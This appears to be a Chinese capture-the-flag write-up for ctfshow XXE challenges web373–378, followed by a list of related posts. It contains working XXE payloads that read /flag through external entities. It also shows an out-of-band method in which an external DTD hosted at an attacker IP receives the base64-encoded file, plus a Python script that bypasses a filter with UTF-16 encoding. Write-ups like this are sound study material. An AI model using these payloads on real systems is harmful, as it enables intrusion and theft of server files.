ctfshow XXE web373-web378 wp
文章目录
- web373
- web374-376
- web377
- web378
web373
XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体
参考文章:一篇文章带你深入理解漏洞之 XXE 漏洞
libxml_disable_entity_loader(false);
:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; )
flag在flag里
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY cmd SYSTEM "file:///flag">
]>
<mumuzi>
<ctfshow>&cmd;</ctfshow>
</mumuzi>
web374-376
和373的区别是没有echo $ctfshow;,即无回显
因为没有回显,所以只能想办法带到自己vps里。
后面的题把xml头给过滤掉了,这里在vps上创建一个dtd文件,用于反弹shell
#test.dtd
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://xxx:10086/%file;'> ">
%dtd;
%xxe;
监听10086端口
然后POST发包即可在vps上收到
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>1</root>
其实当时这里卡了许久,4台vps,有一台一直都关了安全组(只开放了两常用端口),有一台没php环境,有一台被Streamlit占用,这台就是刚刚才装的php环境。自己给自己整麻了
web377
方法和上面一样,但是过滤http,需要编码绕过。
import requests
url = 'http://b70f356b-ab20-4df6-b661-d7827322fc80.challenge.ctf.show/'
data = '''<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://101.35.244.30/test.dtd">
%aaa;
]>
<root>1</root>'''
r = requests.post(url=url,data=data.encode('utf-16'))
web378
忒标准的 XXE
<!DOCTYPE XXE [
<!ENTITY cmd SYSTEM "file:///flag">
]>
<user><username>&cmd;</username>
</user>
ctfshow XXE web373-web378 wp相关推荐
- ctfshow web入门 XXE web373~web378
目录 web373 web374.375.376 web377 web378 学习链接: 一篇文章带你深入理解漏洞之 XXE 漏洞 - 先知社区 web373 burpsuite发包,不能用hackb ...
- CTFShow XXE
前言 XXE 的漏洞在我的上一篇文章有讲过,这里就不多说,直接看题 XXE外部实体注入 web373 有回显的文件读取 <?xml version="1.0"?> &l ...
- CTFShow“萌心区”WP(上)
CTFShow "萌心区"WP详解(上) 萌新认证 萌新_密码1 萌新_密码2 萌新_密码3 萌新_密码4 隐写1 隐写2 萌新_隐写2 萌新_隐写3 萌新_隐写4 萌新_隐写5 ...
- ctfshow—2023愚人杯wp
ctfshow-2023愚人杯wp 热身 热身 100 愚人杯比赛秉承欢乐.有爱.进取的精神 在群里师傅热心帮助下,已经开始第三届比赛啦! 欢迎各位师傅参加,希望大家玩的开心,比赛题目可以自由讨论.但 ...
- [WP/ctfshow/XXE]ctfshow_XXE_web373-378
外部实体注入 WEB373 // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_co ...
- CTFshow 击剑杯 部分WP
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...
- ctfshow sql注入 web171-web253 wp
文章目录 参考文章 sql注入 web171 web172 web173 web174 web175 解法一 解法二 web176 web177 web178 web179 web180-web182 ...
- CTFshow单身杯 部分wp
前言:不会吧不会吧不会有人520521不约会打比赛吧 文章目录 1.单身杯热身题目 2.misc签到 3.没大没小的串串 4.任性老板 5.蛤壳雪茄-1 6.蛤壳雪茄-2 7.The Dancing ...
- ctfshow 89-115 php特性 wp
首先还是非常感谢群主大大和师傅们. 希望ctfshow平台越来越好,做大做强做辉煌. 链接:https://pan.baidu.com/s/12-uMIjaIDllXx4STQIbm5w 提取码:kr ...
最新文章
- 深入理解 wpa_supplicant(一)
- Get 了滤镜、动画、AR 特效,速来炫出你的短视频开发特技!
- Thread 同步线程(打印机同步)
- sublime linux 字体设置,Sublime Text的基本设置有哪些
- 天天写业务代码?写业务代码中的成长机会!
- 语言的顺序表的合拼_2020语文中考专题五:语言运用和综合性学习。掌握基础题五种题型...
- 补丁 检测系统_大云制造 | BCLinux For ARM64 V7.6操作系统正式发布
- 常见操作系统调度算法研究(2)
- 3-5:类与对象中篇——默认成员函数之运算符重载
- 允许活动内容在我的计算机上,然后就看到选项允许活动内容在我的计算机上的文件中运行...
- DataBseDesign工作笔记003---ERStudio使用笔记_基本使用方法详解
- vue组件之间互相传值:兄弟组件通信
- 视频教程-Mikrotik RouterOS 软路由基础教程-网络技术
- 日志管理系统之保存日志到数据库
- gif一键抠图 在线_8个免费在线抠图网站 不会PS的小白也能一键抠出专业效果图...
- 如何检索国外的博士论文
- Tomcat Caused by:java.lang.IllegalArgumentException: 指定的主资源集[……]无效
- Uni-app 实现离线打包 安卓篇
- 发电子邮件怎么发,手机发电子邮件教程来了
- 一个寒门博士的论文后记:我还是没有能力让母亲安享晚年